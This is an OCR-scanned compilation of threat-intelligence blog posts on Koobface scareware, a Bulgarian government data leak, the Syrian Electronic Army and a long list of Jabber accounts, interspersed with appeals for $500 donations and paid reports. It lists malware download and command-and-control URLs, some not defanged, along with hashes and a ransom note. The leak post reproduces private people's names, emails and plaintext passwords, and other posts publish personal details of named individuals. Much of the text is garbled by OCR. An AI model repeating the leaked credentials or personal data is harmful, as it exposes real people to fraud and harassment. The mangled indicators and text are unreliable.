https ://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business .htm 


15.5.7 Historical OSINT - Yet Another Massive Scareware-Serving Campaign Cour- 
tesy of the Koobface Gang (2019-05-05 17:19) 


It’s 2010 and I’ve recently came across to yet another currently active scareware-serving cam- 
paign courtesy of the Koobface gang this time successfully introducing a CAPTCHA-breaking 
module potentially improving the propagation and distribution scale within major social 
networks. 


In this post I’ll discuss the campaign and provide actionable intelligence on the infras- 
tructure behind it. 


Related malicious domains known to have participated in the campaign: 


hxxp://goscandir.com/?uid=13301 - 91.212.107.103 - hosting courtesy of [1]AS29550 - 
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EUROCONNEX-AS Blueconnex Networks Ltd Formally Euroconnex Networks 
hxxp://ebeoxuw.cn/?uid=13301 

hxxp://ebiezoj.cn/22/?uid=13301 

hxxp://goscanhand.com/?uid=13301 


hxxp://byxzeq.cn/22/?uid=13301 


Sample malicious MD5 known to have participated in the campaign: 


MD5: 16575a1d40f745c2e39348c1727b8552 


Once executed a sample malware phones back to: 


hxxp://in5it.com/download/Ipack.jpg - the actual executable 


Related malicious MD5 known to have participated in the campaign: 


MD5: 1d5e3d78dd7efd8878075e5dbaa5c4fd 


Related malicious MD5 known to have participated in the campaign: 


MD5: 6262c0cb1459adc8f278136f3cff2777 


It’s worth pointing out that prior to analyzing the campaign it appears that the Koobface 
gang has recently introduced a CAPTCHA-breaking module which basically relies on the active 
outsourcing of the CAPTCHA-breaking process potentially improving the Koobface spreading 
and propagation effectiveness. 


Sample malicious URL known to have participated in the campaign: 


http://peacockalleyantiques.com/.sys/?getexe=v2googlecheck.exe 


Sample malicious MD5 known to have participated in the campaign: 
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MD5: cf9729bf3969df702767f3b9a131ec2c 


Sample malicious URL known to have participated in the campaign: 


http://peacockalleyantiques.com/.sys/?getexe=v2captcha.exe 


Sample malicious MD5 known to have participated in the campaign: 


MD5: f2d0dbflb11c5c2ff7e5f4c655d5e43e 


Once executed a sample phones back to the following C &C server IPs: 
hxxp://capthcabreak.com/captcha/?a=get &i=0 &v=14 - 67.212.69.230 


hxxp://captchastop.com/captcha/?a=get Si=1 &v=14 - 67.212.69.230 
1 


15.5.8 Historical OSINT - Massive Scareware-Serving Campaign Spotted in the Wild 
(2019-05-05 17:21) 


doremisan7.net?uid=213 &pid=3 &ttl=319455a3f86 - 67.215.238.189 


marketcoms.cn/?pid=123 &sid=8ec7ca S&uid=213 SisRedirected=1 - 91.205.40.5 - Email: 
JeremyLRademacher@live.com 


- MORE REDIRECTORS parked there 
browsersafeon.com A 91.205.40.5 
online-income2.cn A 91.205.40.5 
applestore2.cn A 91.205.40.5 
media-news2.cn A 91.205.40.5 
clint-eastwood.cn A 91.205.40.5 


stone-sour.cn A 91.205.40.5 
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marketcoms.cn A 91.205.40.5 


fashion-news.cn A 91.205.40.5 


LEADS TO 


http://guard-syszone.net/?p=WKmimHVmaWyHjsblo22EexXZe0KCfZlbVoKDb2YmHWJjOxaCbk 
X1 %2Bal6orKWeYJWfZWViIWWenGOIo6THodjxoGjJdpqmikpVuaGVvZG1kbV %2FEKKE %3D 


206.53.61.73 


http://www.virustotal.com/analisis/e664ff540556bcdel9bb7eea967016f491bb024c3d 66b4- 
55d22flafb7bd36b3e-1256160669 


http://yourspywarescan15.com/scan1/?pid=123 &engine=pXT 3wj TUNjYZLJESNy4xNTMmdGItZTOxM- 
jUxXMYKNPAFO - 85.12.24.12 


http://www. virustotal.com/analisis/6e28a767b2f067285389758802e81379687f87864e cc85- 
412e022ebe172c01d1-1256160825 


15.5.9 Offensive Warfare 2.0 - The Future of Cyber Warfare - Hacking and Cyber 
Security Community - Public Registration Now Open! (2019-05-15 10:33) 


G 


® 


Offensive 
Warfare 2.0 


Dear blog readers, 


| wanted to let you know of my newly launched hacking and security community - [1]Of- 
fensive Warfare 2.0 - The Future of Cyber Warfare - Hacking and Cyber Security Community - 
with public registration now open. 
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How you can help? 


- Register today! 
- Share this post with friends and colleagues. 


- Approach me at dancho.danchev@hush.com with your comments feedback and gen- 
eral suggestions 


Stay tuned! 
1. 


15.5.10 Are You On Silent Circle? (2019-05-23 16:43) 


<> ; . 
SS silent circle 


Dear blog readers, 


| wanted to find out whether any of my blog readers might be using [1]Silent Circle - 
and whether you might be interested in approaching me with your Silent Circle ID to get the 
conversation going? 


Feel free to approach me at dancho.danchev@hush.com 


Stay tuned! 


1. 
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15.5.11 Proprietary Threat Intelligence Reports Available On Demand - Request a 
Copy Today! (2019-05-28 20:46) 


Pay-Per-Install 
Cybercrime Business 
Model - Threat 
Intelligence Report 


NOTE: You'll receive a 
copy of this 
complimentary report 
worth $1,500 
approximately 30 days 
prior to making a 
purchase. 


Order $1500.00 


Dear blog readers - | wanted to let everyone know of two - currently in the works - proprietary 
Threat Intelligence type of reports - that you and your organization can easily acquire on 
demand. The first report details in-depth including tactics techniques and procedures including 
hundreds of lOCs (Indicators of Compromise) in terms of the Pay-Per-Install Business Model 
circa 2008 - worth $1,500 and the second report which is also available on demand details the 
inner workings of the CAPTCHA-Solving Underground Market Business Model - which is also 
worth $1,500. 


Similar my most recently - now publicly available - report on "[1]Assessing The Computer 
Network Operation (CNO) Capabilities of the Islamic Republic of Iran - Report" capabilities 
including a complimentary social network graph - the proprietary Threat Intelligence reports 
can be requested online - and the user including the organization will receive a complimentary 
copy of the report - including a possible attribution vector - within 30 days prior to making a 
purchase. 


How you can order a copy of the report? 
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Feel free to approach me at dancho.danchev@hush.com to inquire about making a pur- 
chase. 


Stay tuned! 


1. https://ddanchev.blogspot.com/2015/07/assessing-computer-network-operation_29.htm 
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15.5.12 Proprietary Cybercrime and Dark Web Forum Search Engine - BETA Access 
Available! (2019-05-28 20:48) 


Proprietary 
Cybercrime 
Underground 
Forum Search 
Engine - 
Research Grant 
and BETA Access 
Available 


NOTE: The propr letary 


invite-only Sea 


is 100% ready and working. 
Make a one-time $3,500 
payment: 

for the necess: 

prior to rece 

payment 

Recurring payments - in 
the form of subscription 
based agre¢ i 


Order $3500.00 


Dear blog readers - | wanted to let everyone know of a currently active BETA project - namely - 
the general invite-only proprietary access to a Cybercrime and Dark Web Underground Forum 
Search Engine - exclusively targeting Security Vendors the U.S Intelligence Community and 
Law Enforcement including independent-vetted invite-only subscription-based access to the 
World’s largest and near-real-time repository of Cybercrime Research Data - worth $3,500 
in the form of one-time payment - for the purpose of fueling growth into the project - and 
to request the necessary access - including possible subscription-based agreement - further 
fueling growth into the project and the quality of the inventory of data. 


How to request access? 
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Feel free to approach me at dancho.danchev@hush.com with your inquiry in terms of 
this project. 


Stay tuned! 


15.5.13_ Dancho Danchev’s Blog - Public Comments Now Open! (2019-05-29 08:38) 


DISQUS 


Dear blog readers, 


Ever since 2005 where | originally launched this blog - | decided to turn off public com- 
ments so that | can present a decent portion of my Information Security knowledge to a 
diverse set of audiences. Back in the glorious Web 2.0 years when | was busy doing business 
development and PR outreach for a variety of Security Projects I’ve recently decided that 
the time has come to open public comments on one of the Security Industry’s most popular 
personal blogs on Information Security Cybercrime Research and Threat Intelligence with the 
idea to reach out to everyone reading this blog potentially building a high-quality comment 
and research feedback network of Security Industry members U.S Intelligence Community 
members and the general public. 


Looking forward to receiving your comments - and as always feel free to go through the 
archives to catch up with what I’ve been up to. 


Stay tuned! 
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15.5.14 Dancho Danchev’s Blog - Public Search Now Open! (2019-05-29 08:39) 


15.5.15 Dancho Danchev’s Blog - Audio Version Available - Listen to Every Post! 
(2019-05-30 16:15) 


Dear blog readers, 


| wanted to let everyone know that I’ve recently introduced an audio-listening functional- 
ity to every blog post basically allowing you to listen to every blog post on this blog. What do 
you think? 
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Basically it allows you to easily plug and play your head-set and listen on current histori- 
cal and upcoming posts. Stay tuned for an updated set of features to be implemented anytime 
soon. 


Consider going through the following high-profile Security Interviews which | managed 
to produce throughout 2003-2006 while working for [1JAstalavista Security Group. 


- [2]Security Interviews 2004/2005 - Part 1 
- [3]Security Interviews 2004/2005 - Part 2 


- [4]Security Interviews 2004/2005 - Part 3 
including the following commentary and Open Letter to the U.S Intelligence Community: 


- [5]The Threat Intelligence Market Segment - A Complete Mockery and IP Theft Com- 
promise - An Open Letter to the U.S Intelligence Community 


Enjoy and stay tuned! 


1 ftps: //packetstorasecurity .con/files/author/8007/ 

2, https: /adanchev blogspot. con/2006/04/security-interviewe~20042005-part~1. heal 

3, https: /adanchev blogspot. con/2006/0 /security-interviews~20042005-part-2. html 

4, httpe://adanchev. blogspot .con/2006/01/security~interviews-20042005-part9. neal 

5, https: //adanchev blogspot. con/2019/01/the- threat-intel1igence-narket-segnent hin 


15.5.16 Upcoming Security Project - Accepting Donations and Feedback! 
(2019-05-30 17:11) 
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Dear Blog Reader, 


It's been several years since | last posted a quality update - and | decided 
that the time has come to raise the stakes a little higher by attempting to 
raise the necessary funds necessary to launch a proprietary and invite-only 
World's Leading Information Security Portal - with the help of my blog 
readers who've been following my research and experience in fighting 
cybercrime throughout the past 10 years. How you can help? Consider 
making an introduction and donating a mere $500 for the purpose of 
further fueling growth into the upcoming Security Project - that I've been 
recently spending most of my time working on. What I can promise? | will 
personally reach out to everyone who's been following my blog throughout 
the years - and make a personal introduction - further introducing the 
Security Project - that I've been working on - and to further explain the 
current status of the project including a detailed explanation as to where 
the money goes for including the necessary “pitch-based” PPT 
presentation and the long-term and short-term plan for the purpose of 
this Security Project. 


As | consider you a trusted member of the Security Industry the U.S 
Intelligence Community and the general public including a valued blog 
reader throughout the past decade - | will be definitely looking forward to 
receiving the necessary introduction on your behalf - including a modest 
$500 donation to keep the Security Project - that I've been busy working 
on going. 


What do | have in mind? Throughout the past decade malicious and 
fraudulent actors including nation-state actors continued to proliferate 
successfully causing millions in damages potentially exposing millions of 
users to basic Secuity Threats. The main purpose of this Security Project 
will be to launch manage and operate the World's Largest and Most 
Popular information Security Portal including the general availability of 
proprietary invite-only community-based and commercial Security 
Products and Services successfully serving the needs of millions of users 
globally. 


Are you satisified with my research? Do you like what you're seeing? Shall 
we raise the stakes a little higher? Consider making a modest $500 
donation today - and I'll reach back to you within a couple of hours prior 
to receiving it for the purpose of making a personal introduction and to 
introduce the Security Project including to present the necessary PPT for 
the purpose of raising the necessary amount to get the project going. 


Dear blog readers | wanted to let everyone know that I’ve recently added a "Donate Today!" 
button including a Pop-Up banner within my blog with the idea to [1]seek you donations and 
feedback to raise the necessary capital for an upcoming Security Project. 


How you can contribute in case you’re a long-time reader of this blog - and want to pos- 
sibly see more high-quality Security and Cybercrime research? Consider making a modest 
$500 donation - which will better help me to scale the project and eventually launch it. 


Feel free to approach me at dancho.danchev@hush.com 
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Stay tuned! 


1. https://form. jotformeu. com/9147309955136 


15.6 July 


15.6.1 Upcoming Offensive Warfare 2.0 Cyber Security and Hacking Community 
YouTube Livestream Broadcast - RSVP Today! (2019-07-02 11:17) 


Dear blog readers, 


| wanted to let everyone know that I'll be doing a Live YouTube Broadcast - this Friday - 
05/07/2019 20:30 P.M - Eastern European Summer Time (EEST), UTC +3 in terms of [1]my 
newly launched Offensive Warfare 2.0 - Cyber Security and Hacking Community. Are you 
interested in attending and learning more about the project? [2]RSVP Today and consider 
[3]registering to get the conversation going! 


Feel free to approach me dancho.danchev@hush.com 


Stay tuned! 


1. https://www.offensive-warfare.com/blogs/entry/1-offensive-warfare-20-official-community-launch-announce 


ent/?ct=1562058688 
2. https://offensive-warfare.app.rsvpify.com/ 
3. https: //www.offensive-warfare.com/registe 


15.6.2 Exposing Bulgaria’s Largest Data Leak - An OSINT Analysis (2019-07-27 10:46) 
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I’ve recently came across to a news article detailing the recently leaked Bulgaria NAP records 
database and | decided to take a closer look. What does this leak basically constitute? 
Basically the attacker managed to compromise the security of the Web Site basically leading 
to a successful extraction of a decent-portion of data which could basically constitute a leak. 


NOTE: The data in this analysis has been obtained using public sources. 


Send $500 in Bitcoin to "3Ex6LeHorgRjikBmws4SsRZ3FXSJDXkSFhP" or forget about your files. 


Contact wp@instakilla.com for assistance in securing your web server 
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instakilla_ | Follow | 


2 posts 68 followers 145 following 


Daniel Ganchev 
Instakilla.com 


In this post I'll profile a novice Bulgaria-based cybercriminal that basically managed to 
obtain access to the database and shared it within several cybercrime-friendly forum com- 
munities making it publicly accessible including an in-depth overview of TAD Group which is 
basically a Bulgaria-based penetration testing company. 


=] 
A 
D 
a 
a 
4 
Ly 
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lz 
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Gmail 


u 


First Name: Katya First Name: Mapas 
xSplit 

Last Name: Slavova Last Name: Heitxona 
Hotmail | Yahoo 


SQLDumps Username: katya Username: mmmnnn666 


RU E-mail; k.r.alexandrova@abvy.be E-mail: mmm_neik@abv.bg 


Tumpbir Password: f)7415fa Password: komputer 


4 
A 


Linkedin a oe 
First Name: [[eerennua First Name: Stanislava 


Ipmart 


- Last Name: Teopraena Last Name: Pefticheva 
Mortal Online 


Username: lina Username: stanislava608 
— 
Black E-mail: lina_g@abv.bg E-mail; taffi_to@abv.bg 


More Tools Password: 25471771 Password: pefticheva 
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Real Name: Daniel Ganchev - Email: daniel.ganchev@abv.bg 


Sample URL of the cybercriminal involved in the campaign: 


hxxp://instakilla.com/ - Email: wo@instakilla.com; info@instakilla.com 


Instagram Account: hxxp://www.instagram.com/instakilla _/ 


Bitcoin address used in the campaign: 3Ex6LeHorgRjkBmws4SsRZ3FXSJDXkK5FhP 


Bd F\rintin_feaic zip MINFIN_BREACH\INCORRTP, 


file Edit Yew favorites Tools Help 


. 
c+ = w > om x ai ,OesxTor Kpuccc,, 13.05.2019 11:49, file C:/Users/Kpucce /AppOata/Roaming/Libredtfice/4; 


Add Extract Test Copy Move Delete into 


racked Size Modified ated ce Attributes ed me CRC Hest OS 
105 1989-31-10 1 wer AOMELTEA deflate [une | 

12427 187 1969-11-101 tw-t wn ’ ate rex 
1701 1989-11-10 1 wet y c 

©) DECTS_BSTAT_EGN_SUMcsv $046169T 19288148 1989-11-101 wet 

0) DECT3_DETARS caw $18 170 757 13 199786 1989-11-101 tweet 

) EMP cov 3247 3348 1989-11-10 14 w-r 

> OBS.cov i) A 1969-11-10 161 wet 

BNFD 1 9601189 1989-11-101 wr 

o 6 17409 1089-11-10 1 tweet 

o 44 1989-11-10 1 wet 

o OS 1989-11-101 wt 


Sample additional domain known to have been used by the same 
hxxp://209.250.232.143 


Related URLs known to have participated in the campaign: 


https://instakilla.com/5k.txt 


https://instakilla.com/teaser.txt 


Sample Screenshot of the Original Letter Send to Journalists: 


RC Method = sat OS 


individual: 
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Hello and thank you for making awareness of the happening. I will send 
this email only for BTV, NovaTV and Capital because I saw real journalism 
only from your media. 


Yesterday one journalist from NovaTV replied to the minfin_leak@yandex.ru 
email and asked 3 questions... I will be happy to give you more 

information regarding the breach so that your corrupted government won't 
lie to your readers. 


1. The data leak is happening for 11 years. If you corrupted government 
disclose the vulnerable system you can see this information from the Web 
Archive (Internet Wayback Machine). This has been hacked before in 2012 
but back then no one even understood that we managed to infiltrate over 
30GB of information. 


2. I'm a russian citizen with 2 bulgarian wife. Her parents are currently 
living in Bulgaria and I saw with my eyes how fucked up your country is. 


3, The data is currently being investigated as far as I understood, but 

the real questions are not being asked? That's why I gave you the original 
dump of the databases, sent to 56 media websites in your country but as 
far as I see only Capital is doing some real digging into the information? 
Why? 


4, Your stupid law enforcement won't find shit... They will just cover the 
real truth. :) 


5. If they don't tell the truth I will personally upload the 21GB dump in 
russian and bulgarian torrent trackers so that everyone will be able to 
download the information freely. 


6. If any of the contacted media happen to give false information about 
what's happening I will publicly disclose 2 different dumps from your 
government which are once again from Ministry of Finances. I also have 
access to 3GB database dump from BTV Media Group and from 2 more media 
companies which were from the list of contacted media. 


Let the corrupted games begin. :) 


Let’s take a closer look at the Bulgaria-based TAD-Group is basically a well-known pene- 
tration testing company currently running Bulgaria’s largest and most popular hacking forum 
community - hxxp://www.xakep.bg which was recently blamed for Bulgaria’s largest database 
leak in particular its founders and several employees in the context of performing an OSINT 
analysis basically highlighting some of the key functions of the company and its involvement 
in the incident. 


Sample Company Logo: 
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wuu.tadgroup.com 


Sample Hacking Forum Logo: 


AK Mer.3G 


3Y 


Sample Exploits Developed courtesy of the founder of the group: 
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Sample Photos of TAD Group Employees: 
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Powered by 
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What is a timing attack? 


vera Ic d09 Be 7684987374790 ) 


} 
ones SE) 
/ 


2ins 1605 195 1708 no ) 


Sample TAD Group Photos: 
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UFFENSIWE 
security 


THIS IS TO ACKNOWLEDGE THAT 


__lvan Todorov — 


IS CERTIFIED AS AN 


OSCP 


(Offensive Security Certified j2) o40.. lon 


AND HAS SUCCESSFULLY Com COMPLETED ALL REQUIREMENTS AND 
CRITERIA FOR SAID CERTIFICATION THROUGH ON 
ADMINISTERED BY OFFENSIVE SECU! 


THIS CERTIFICATION, EARNED ON 


18th of June 2018 


Mack Aharon 
Mati Aharoni 


security 


Related personally identifiable information of TAD members: 


Real Name: Ivan Todorov 


Email: todorov i@tadgroup.com; todorov i@subway.bg 
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Related social network accounts: 


hxxp://github.com/chapoblan 


hxxp://www.facebook.com/chapoblan/ 


Sample Bulgaria Leaked Database URL: 


hxxp://uploadfiles.io/s1p3gzh8 


Sample Email known to have been used in the campaign: 


Email: minfin leak@yandex.ru 
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Sample MD5 known to have been used in the campaign: 


MD5: 3125f2f04d3bac84c418ceb321959aba 


It’s also worth pointing out that I’ve managed to come across to a fraudulent proposition cour- 
tesy of the hxxp://www.xakep.bg cybercrime-friendly forum community with the cybercriminal 
behind it currently soliciting managed hacker-for-hire type of services. 


Sample screenshots courtesy of the service: 
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We'll be keeping an eye on the campaign and we'll post updates as soon as new developments 
take place. 


15.6.3 Who’s Behind the Syrian Electronic Army? - An OSINT Analysis 
(2019-07-28 18:19) 


Continuing the "[1]FBI Most Wanted Cybercriminals" series I’ve decided to continue providing 
actionable threat intelligence on some of the most prolific and wanted cybercriminals in the 
World through the distribution and dissemination of actionable intelligence regarding some of 
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the most prolific and wanted cybercriminals. 


Following a series of high-profile Web site defacement and social media attack campaigns 
largely relying on the utilization of good-old-fashioned social engineering attack campaigns - 
it appears that the individuals behind the Syrian Electronic Army are now part of [2]FBI’s Most 
Wanted Cyber Watch List which means that I’ve decided to conduct an [3]JOSINT analysis 
further sharing actionable intelligence behind the group operators with the idea to assist law 
enforcement and the U.S Intelligence Community with the necessary data which could lead to 
a successful tracking down and prosecution of the team behind these campaigns. 


In this post I’ll provide actionable intelligence on the group behind the Syrian Electronic 
Army including actionable intelligence on the infrastructure on some of their most prolific 
social engineering driven campaigns. 


Sample Personal Photo of Ahmad Al Agha: 
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Sample Personal Photo of Firas Nur Al Din Dardar: 
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Sample Web Site Defacement Screenshot courtesy of "The Shadow": 
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2 erogn net GB vecte 


2 See What's Het 1/1/2.. = of WidTengert Games - 


Hacked By Ethical Dragon 
Don't Ignore My Emails 


For more security ; dragonethical@gmail.com 


Sample Screenshots of the Syrian Electronic Army Web Site Defacement Activity: 
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Mirror of US Press & Eco Digest December 3, 2013 
Mirror of US Press & Ece Digest December 4, 2013 
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Mirror of US Press & Eco Digest December 3, 2015 
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Related domains known to have participated in the campaign: 
hxxp://quatar-leaks.com 

hxxp://net23.net 

hxxp://secureids.washpost.net23.net 
hxxp://mail.hrw.net84.net 

hxxp://soul.websitewelcome.com 
hxxp://blog.conservatives.com/wp=content/uploads/cnn.php 
hxxp://iknhwansuez.net/cnn.php 

hxxp://klchr-pshr.com/bo.php 
hxxp://gloryshipsghana.com/wh.php 
hxxp://centriplant-dev.coreware.co.uk/wp-content/blogs.dir/ob.php 
hxxp://deliveryroutes.co.uk/ch.php 
hxxp://sws-schulen.de/gn.php 


hxxp://sws-schulen.de/ut.php 
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hxxp://kulalars.com/jwt.php 


hxxp://karisdiscounts.com/nasa.php 


Related IPs known to have participated in the campaign: 


hxxp://91.144.20.76 
hxxp://194.58.88.156 
hxxp://88.212.209.102 
hxxp://141.105.64.37 
hxxp://213.178.227.152 
hxxp://82.137.248.2 
hxxp://82.137.200.5 
hxxp://94.252.249.94 
hxxp://5.149.101.187 
hxxp://82.137.248.3 
hxxp://76.73.101.180 
hxxp://82.137.248.3 
hxxp://81.137.248.4 
hxxp://82.137.248.5 
hxxp://82.137.248.6 
hxxp://91.144.18.219 
hxxp://178.52.134.163 
hxxp://78.46.142.27/ WH 
hxxp://78.46.142.27/ syrian 
hxxp://46.17.103.125 


hxxp://46.57.135.14 
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hxxp://188.139.245.9 


hxxp://82.137.250.235 


Social Media Accounts: 

hxxp://twitter.com/Official SEA 
hxxp://twitter.com/ThePro Sy 
hxxp://instagram.com/official sea3/ 
hxxp://pinterest.com/officialsea/ 
hxxp://www.facebook.com/sea.theshadow.716 
hxxp://linkedin.com/pub/th3pr0-sea 
hxxp://plus.google.com/116471187595315237633 
hxxp://flickr.com/photos/th3pr0 


hxxp://foursquare.com/user/29524714 


Skype account IDs known to have participated in the campaign: 
syria.Sec 

koteba63 

koteba 

sea.shadow3 

the.shadow21 

tiger.white20 

nana.saifo10 


nana.saifo 


Related emails known to have participated in the campaign: 
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th3pr0123-ap2@gmail.com 
th3pr0123@gmail.com 
whitehouse-online@hotmail.com 
whitehouse _online@hotmail.com 
sea.the.shadow@gmail.com 
leakssyrianesorg@gmail.com 
leaks.syrianes.org@gmail.com 
syrian.es.sy@gmail.com 
syrianessy@gmail.com 
sea.wr4th@gmail.com 
prO@hotmail.nl 
sy@hotmail.com 
sy34@msn.com 
killboy-1994@hotmail.com 
jlO@hotmail.com 
cf3@hotmail.com 
zq9@msn.com 
doom.ceasar@gmail.com 
y8p@hotmail.com 
rql1@hotmail.com 
cf3@hotmail.com 
wassemkortab@yahoo.com 
sf0725zq0330@dressmall.com 
adam.magdissi@hotmail.com 


bf6@hotmail.es 
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b-6f@hotmail.com 

bg _@hotmail.com 
asdelylord@hotmail.com 
i-Bu@hotmail.com 
b-8q@hotmail.com 
tiger.tiger248@gmail.com 
nagham _saifo@hotmail.com 
edwinjouhansyah@gmail.com 


sea.coders@hotmail.com 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


1. https://ddanchev.blogspot.com/2019/01/exposing- irans-most-wanted.htm 
2. https://www.fbi.gov/wanted/cyber/ahmed-al-agha 
3. https: //www.fbi.gov/wanted/cyber/firas-darda 


15.6.4 Profiling a Currently Active Portfolio of High-Profile Cybercriminal Jabber and 
XMPP Accounts (2019-07-29 17:05) 
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= 
@ Off-the-Record Messaging 
| 


My private keys 


Key for account: | SPP) [>] 


No key present 


Generate 


Default OTR Settings 


|\¥| Enable private messaging 
(¥| Automatically initiate private messaging 
("| Require private messaging 


(¥| Don't log OTR conversations 


OTR UI Options 


(¥| Show OTR button in toolbar 


In a world dominated by [1]fraudulent propositions it should be noted that Jabber and XMPP 
remain the primary secure communication channel for a large portion of cybercrime-friendly 
propositions that | come across to on a daily basis largely relying on [2]Off-The-Record type of 
functionality. 


I’ve recently came across to a public list of harvested and data-mined high-profile cyber- 
criminal’s Jabber accounts and I’ve decided to share it with my blog readers for the purpose 
of establishing the foundations for a successful "[3]lawful surveillance" and "[4]lawful inter- 
ception" type of operational activity. 


0-day@jid.pl 
000111999@jabbim.com 
000111@jabber.cz 
000@jabster.pl 


O0O00tolkin@xmpp.jp 
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001001 @default.rs 
0025@0nl1ne.at 
007192@darkdna.ne 
007192@exploit.im 
007192@monopoly.cc 
007bond@jabber.hot-chilli.net 
OO@jabbim.sk 
OOff@xmpp.jp 
01.234.56@exploit.im 
01001011@xmpp.jp 
010101@exploit.im 
02xpos@exploit.im 
02xpos@zoho.com 
0901@xmpp.jp 
O@jabber.ru 
O@jabber.rue 
0a04xd4@riseup.net 
Ochiaki@xmpp.cm 
Odaybot@exploit.im 
Odayexp@exploit.im 
Ody@exploit.im 
Omg@riseup.net 
Onton@swissjabber.ch 
Opt!c@thesecure.biz 


Opt@exploit.im 
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Outsider@jabber.se 
Ox0@jabber.se 
Ox22hash@crypt.mn 
Ox22hash@exploit.im 
Ox3r@rows.io 
0x40@sj.ms 
0x43@exploit.im 
0x4h4x@evil.im 
0x736a@jabber.de 


0x90@darkness.su 


Oxbad40298@securejabber.me 


Oxcsrf@rows.io 
Oxdadall1c7@exploit.im 
Oxdadallc7@jabber.ru 
Oxfff@exploit.im 
Oxgs@jodo.im 
1000@creep.im 
10010000@exploit.im 
1001001 @default.rs 
100100@xmpp.ru 
1001Lwvwv@dlab.im 
1003001@exploit.im 
100820@jabber.ru 
100btc-exchange@exploit.im 


100key@jabber.at 
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100kotob@xmpp.jp 
101-201@exploit.im 
101 @infraud.cc 
101@sj.ms 
102@police.ua 
1047@crypt.mn 
1047@exploit.im 
106655@iera.de 
10@exploit.im 
10k@zloy.im 
111000@exploit.im 
111333888@darkjabber.cc 
111666@jabme.de 
111777@korovka.pro 
111@mpro.la 
1122331144999@limun.org 
1122334@xmpp.jp 
112233@darkjabber.cc 
112233@exploit.im 
112234@exploit.im 
1183498@jabber.se 
123321qq@xmpp.jp 
1234567@exploit.im 
1238123@dukgo.com 


1238123@privatjabber.com 
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123abc@default.rs 
1337@jabbim.cz 
1337day@jabber.org 
1337face@digitalgangster.com 
13@headcounter.org 
13ice37@jabber.ccc.de 
150456@jabber.at 
16443@xmpp.jp 
1777@exploit.im 
17code@xmpp.jp 
18*@jwchat.org 

1941 @swissjabber.li 
1988@xmpp.jp 
1????1777@exploit.im 
1@1.com 
1@chatme.im 
1@crypt.am 
1@exploit.im 
1@fuckav.in 
1@jabber.se 
1@monopoly.cc 
1@mpro.la 
1@seva.club.tw 
1@wwh.ms 


laccseller@jabber.dk 
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lallkeyl@pandion.im 
1Lbalorcim@jabber.ru 
1lchan@conference.jabber.ru 
1lchan@jabber.ru 
1lchanca@conference.sj.ms 
leo@exploit.im 
Lhanl@jabber.ru 
Lhelsenki@exploit.im 
Lheymickey1@xmpp.jp 
1jz@hot-chilli.net 
1jz@inbox.im 
1malik1@exploit.im 
1lne@exploit.im 
1Inf3rn0@jabber.at 
1nf4mOus@swissjabber.ch 
1nsider@jabber.cd 
1lnsider@xmpp.jp 
1Invis@exploit.im 
lojkra@exploit.im 
loo@exploit.im 
1pacl@exploit.im 
1lrezzzz@exploit.im 
lse@jabber.se 
1sss@exploit.im 


1lst@default.rs 
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1lstetcgoldmedal@dukgo.com 
lwlwlwl@xmpp.jp 
2015mad@Online.at 
201lorg@jabbim.sk 
202010@exploit.im 
202????10@exploit.im 
206ywoodnya206@jabber.ru 
20snow@germanyhusicaysx.onio 
20snow@germanyhusicaysx.onion 
212@jabster.pl 
220usd@exploit.im 
22222193@jabber.cz 
222333@darkjabber.cc 
222ssn@securetalks.biz 
2251791683@qq.com 
228@swissjabber.ch 
231@live.fr 

23@li.fr 
24hackjb@exploit.im 
24imp@xmpp.jp 
24karat@im.apinc.org 
2517@xabber.de 
2577525@exploit.im 
26102016@exploit.im 


2688@0nllLne.at 
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289415@thesecure. biz 
2@exploit.im 
2b51df8ba5@jabber.calyxinstitute.org 
2d@exploit.im 
2day@swissjabber.ch 
2face@exploit.im 
2garin@prv.name 
2garinfox2@jabber.se 
2min@jabber.ccc.de 
2r4b@jabber.prtship.com 
2spylopez@im.apinc.org 
2tracks@jabber.se 
2undoxable@blah.im 
303@riseup.net 
306yonge@jabbim.com 
30715@thiessen. it 
3077324@xmpp.jp 
309h@dlab.im 
30topandexp@swissjabber.ch 
3123@exploit.im 
31337elite@jabber.no 
31415926@exploit.im 
321321@jabbim.pl 
3245@jwchat.org 


327@prv.name 
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333000@jabber.ccc.de 
33333353@jabber.ru 
333993339@exploit.im 
337788@chatme.im 
337788@drauger.de 
337788@draugr.de 
337788@im.apinc.org 
352623@0nl1ne.at 
3708111@exploit.im 
39781 @jabber.cz 
3@exploit.im 
3ahyga@fuckav.in 
3am@exploit.im 
3ddd@dukgo.com 
3fr33t@swissjabber.ch 
3n3***@jabber.ru 
3n3rgie@jabber.ru 
3trino@exploit.im 
3xp1r3@ch3kr.net 
3xpl01t@exploit.im 
3xploit@chatme.im 
3zzy@jabber.ru 
4.ukdeadfullz@xmpp.jp 
4.vevzoroaster@xmpp.jp 


4.xxakep@exploit.im 
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404@xmpp.jp 
437282@xmpp.jp 
445775263@qip.ru 
44616@exploit.im 
454@jabber.cz 
4550085@gip.ru 
4601020@xmpp.jp 
474754547@jabber.no 
477577@sj.ms 
479973@hackforums.im 
4878731@cq86831.twsite.de 
489452@jabb.im 
489452@jabbim.com 
489452@jabme.de 
492962059@xmpp.ru 
4?mstore.com@jabber.de 
4?mstore.com@xmpp.jp 
4@jabber.de 
4asovschik@exploit.im 
4ayneg@jabber.org 
A4dler@exploit.im 
4dler@jabb.im 
4ester@exploit.im 
4ngel@germanyhusicaysx.onio 


4ngel@germanyhusicaysx.onion 
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4pda.ru@jabber.ru 
A4sh!r@sj.ms 
4thewin@exploit.im 
5.14.cic@pandion.im 
50055550@exploit.im 
503@xmpp.jp 
517611@jabber.cz 
524362@jabbim.com 
536636@qip.ru 
541558@default.rs 
541558@detault.rs 
541558@jabbim.cz 
541558@labbim.cz 
54378943@exploit.im 
555111@jabber.cz 
555555471 @jabba.biz 
555@darkjabber.cc 
5763634634@exploit.im 
589874@qip.ru 
594759622@jabber.org 
596056@sj.ms 
59731pingi@jabber.cz 
59731pingi@xmpp.jp 
5@jabber.se 


5h3llcOd3@jabbim.cz 
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5maks5@exploit.im 
6030735@sj.ms 
605113@exploit.im 
627x@default.rs 
628113641 @jabber.ru 
62916@shangryla.net 
6341600@0nl1ne.at 
634635@jabber.se 
635635@bestcrd.pw 
635chs@exploit.im 
6421211@0nlI1Lne.at 
6499847@0nl1ne.at 
656319775@jabber.cz 
66400@0nl1Lne.at 
665474417@jabber.ru 
66667777@exploit.im 
666@crypt.mn 
666@kaddafi.me 
666hounter@jabme.de 
667292666@qip.ru 
671388820@creep.im 
685869462@exploit.im 
685869462@xmpp.ru 
